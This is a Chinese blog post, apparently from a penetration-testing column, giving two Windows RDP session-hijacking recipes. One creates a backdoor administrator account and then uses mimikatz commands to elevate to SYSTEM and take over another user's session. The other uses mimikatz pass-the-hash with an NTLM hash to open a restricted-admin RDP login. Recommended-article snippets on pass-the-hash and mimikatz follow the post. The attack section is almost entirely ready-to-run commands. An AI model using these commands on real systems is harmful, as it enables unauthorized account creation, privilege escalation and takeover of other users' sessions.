关于RDP劫持小技巧

最新推荐文章于 2024-09-06 15:06:58 发布

原创最新推荐文章于 2024-09-06 15:06:58 发布 · 1.1k 阅读

1 ·

本内容遵循CC 4.0 BY-SA版权协议

收录于

内网渗透专栏收录该内容

18 篇文章

订阅专栏

本文详细介绍了两种Windows系统下的权限提升和会话劫持方法。第一种方法通过创建用户并利用mimikatz工具，执行privilege::debug、ts::sessions、token::elevate和ts::remote/id:1命令实现权限提升和会话劫持。第二种方法则是使用mimikatz的pth模块，输入特定命令以远程登录并实现权限获取。这些技术涉及系统安全和黑客攻击防范。

一、劫持方式1：

创建用户：

net user test 123.com /add net localgroup administrators test /add

登录后，使用mimikatz工具

privilege::debug #提权 

ts::sessions #查看当前主机的会话

token::elevate #提升本地管理员权限为system 

ts::remote /id:1 #劫持id为1的会话

二、劫持方式2：

mimikatz命令如下：

privilege::debug 

sekurlsa::pth /user:9821 /domain:DESKTOP-6RVIHJ2 /ntlm:e5df2c988f0d77ef35a9bdc95b5 "/run:mstsc.exe /restrictedadmin"

执行后弹出远程登录界面，如下图选择连接，成功实现远程登录

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Adminxe

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

SharpRDPHijack:POC远程桌面（RDP）会话劫持实用程序，用于断开连接的会话

03-08

夏普RDPH劫持 Sharp RDP Hijack是用于断开会话的概念验证.NET / C＃远程桌面协议（RDP）会话劫持实用程序背景 RDP会话劫持是一种开发后技术，用于控制（强制）断开的交互式登录会话。在描述了该技术。笔记 SharpRDPHijack.cs在.NET Framework v.4下的Visual Studio 2019中进行编译。会话劫持需要提升的（管理员）上下文才能连接到另一个会话。除非知道目标会话用户的密码，否则需要NT AUTHORITY \ SYSTEM上下文来控制会话。没有提供的密码，SharpRDPHijack将（试图）模拟NT AUTHORITY \ SYSTEM。 Windows 2019 Server会话劫持与先前的OS版本相比表现出有趣的行为。劫持了重定向到活动RDP会话的会话后，Windows登录屏幕会提示您输入用户的密码/凭据

参与评论您还未登录，请先登录后发表或查看评论

RDP之远程登录

战神/calmness的博客

06-23

2370

简述最近搞内网渗透测试，发现得经常的去连接远程桌面，故此写一下整理一下笔记，巩固一下知识 rdp服务是我们常用的服务，可以不是3389端口，可以改成任意端口，时候为了利用它，必须先找出来服务端口，毕竟管理员也鸡贼。查看RDP服务端口查看rdp服务端口 REG QUERY “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /V PortNumber 得到连接端口为 0xd3d

RDP会话劫持

Armandhe的博客

07-22

2709

这个我也觉得很骚气啊，只是原理并不清楚

利用哈希传递登录 RDP 远程桌面

网络安全。

01-15

3585

Windows Server 2012 R2 采用了新版的 RDP 远程桌面协议，在这个新版协议中有一个 ”受限管理员” （Restricted Admin）的特性。相信渗透测试人员和系统管理员都会对这个特性有足够的兴趣，因为通过这个特性，我们可以实现哈希传递攻击并成功登录远程桌面。在抓取到的 Hash 无法破解的情况下，如果目标主机开启了 “Restricted Admin Mode” 也行，那么我们便可以使用 Hash 来直接实现 RDP 远程登录。

mimikatz实战域渗透抓取域控管理员密码

最新发布

ULGANOY的博客

09-06

2140

RDP相关安全漏洞

rdp劫持学习

whojoe的博客

05-13

1158

rdp劫持学习rdp服务确认启动通过注册表查询通过进程查看启动rdp中间人攻击登录shift后门结合rdp劫持多用户登录手动设置rdpwrap参考文章 rdp服务确认启动通过注册表查询 REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections # 查看RDP服务是否开启：1关闭，0开启 REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\C

域渗透之那些显为人知的RDP漏洞

把自己活成一道光，因为你不知道，谁会借着你的光，走出了黑暗。请保持心中的善良，因为你不知道，谁会借着你的善良，走出了绝望。请保持你心中的信仰，因为你不知道，谁会借着你的信仰，走出了迷茫。请相信自己的力量，因为你不知道，谁会因为相信你，开始相信了自己....

12-08

3153

远程桌面对了解内网渗透的人来说可能再熟悉不过了。在渗透测试中，拿下一台主机后有时候会选择开 3389 进远程桌面查看一下对方主机内有无一些有价值的东西可以利用。但是远程桌面的利用不仅如此，本节我们便来初步汇总一下远程桌面在内网渗透中的各种利用姿势。

内网渗透之PTH

cxk

06-03

3426

PTH （pass-the-hash） pass-the-hash在内网渗透中是一种很经典的攻击方式，原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务，而不用提供明文密码。 pass the hash原理：在Windows系统中，通常会使用NTLM身份认证 NTLM认证不使用明文口令，而是使用口令加密后的hash值，hash值由系统API生成(例如LsaLogonU...

内网渗透：四、windowsRDP-hash传递登录

liu_jia_liang的博客

02-21

7063

windows的RDP-hash登录利用在渗透测试中，如果获得了某个用户的NTLM hash，我们可以尝试使用hash传递的方法对WMI和SMB服务进行登录，对于远程桌面服务同样可以进行利用。抓取hash无法破解的情况下，如果使用hash远程登录RDP，需要开启"Restricted Admin Mode", 在Windows8.1和Windows Server 2012R2上默认开启。一：windows RDP-受限管理模式 Restricted Admin mode简介官方说明：Restric

记一次bypass拿下主机过程

Adminxe的博客

04-24

1083

0x00 前言今天DR发来一个shell，提不上权，而且杀软挺狠，直接就开整，记录下思路。 0x01 全文快览不给大佬看废话时间，突破线路如下： webshell–>突破cmd禁用–>重构EXP突破向日葵RCE–>突破提权获取lsass文件–>突破杀软查杀落地dmp文件–>突破windows defender AMSI–>突破某杀软拦截用户添加–>尝试RDP劫持–>浏览器解密碰撞密码获得权限。 0x02 shell环境 1、c...

〖教程〗RDP会话劫持 Ladon无密码登陆管理员桌面会话

K8哥哥

08-08

1492

前言 Windows系统下，tscon或任务管理器右键可被用来切换远程桌面的会话。正常情况下，切换会话时需要提供登录密码，但在SYSTEM权限下可够绕过验证，无密码实现未授权登录。该漏洞在2017年由以色列安全研究员Alexander Korznikov在个人博客中披露，mimikat里面也有该功能，为了方便Ladon也添加了该功能。背景实战中某个项目的内网HTTPS证书有问题，特别奇葩不知为何，代理或CMD下无法连WEBSHELL，还有些远程连接程序管理员连着远程机器，特别是连着数据库的在自动处理数

RDP劫持：如何透明劫持RDS以及RemoteApp会话

diansuimo2268的博客

03-11

604

https://www.anquanke.com/post/id/101525 转载于:https://www.cnblogs.com/7bit/p/10510677.html

rdp连接工具_横向渗透之 [RDP]

weixin_39928940的博客

11-27

1858

重生信息安全T3ngYu一、RDP 服务确定和启动 1. 确定RDP服务是否启动和服务端口（1）注册表查询REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections # 查看RDP服务是否开启：1关闭，0开启 REG QUERY "HKEY_LOCAL_MACH...

内网渗透-域渗透简单思路

weixin_44110913的博客

10-16

4800

文章目录1.权限提升2.渗透姿势爆hash，爆aes key爆hash爆aes key3.远程登录注册表修改连接命令4.连接操作PTH攻击(利用明文或hash连接)IPC(明文连接主机)WMI(利用明文连接)SMB(利用明文或hash连接)RDP(利用明文或hash连接)WMI工具(利用明文或hash连接)PTK攻击(aes key 进行连接)PTT攻击(权限维持)Golden ticket（黄金票据）silver ticket（白银票据）5.bat批量连接测试 1.权限提升一开始一定要提到admini

mimikatz的基本使用

a3320315的博客

05-25

1万+

常见命令 cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称--

Mimikatz 攻防杂谈

07-21

782

前几天看到了老外一篇讲 mimikatz 防御的文章，感觉行文思路还不错，但是内容稍有不足，国内也有一篇翻译，但是只是照着错误翻译的，所以就萌生了把那篇优秀文章，翻译复现，并加入其它一些内容，本文只是抛砖引玉，文中有错误的话，欢迎吐槽。 mimikatz 在内网渗透中是个很有用的工具。它可能让攻击者从内存中抓到明文密码。大家都知道这个工具很厉害，微软肯定也知道了，所以就搞了一些安全防护...

如何防御mimikatz致敬Mimikatz攻防杂谈学习笔记

weixin_30496751的博客

09-11

455

零、绪论：mimikatz简介 mimikatz是一款出色的内网渗透工具，可以抓取windows主机的明文密码、NTLMhash值或者kerberos对应的缓存凭据。mimikatz的使用在获取权限后可以上传到目标主机上，或者在msf上直接加载。 Mimikatz Commands ================= Command Description ...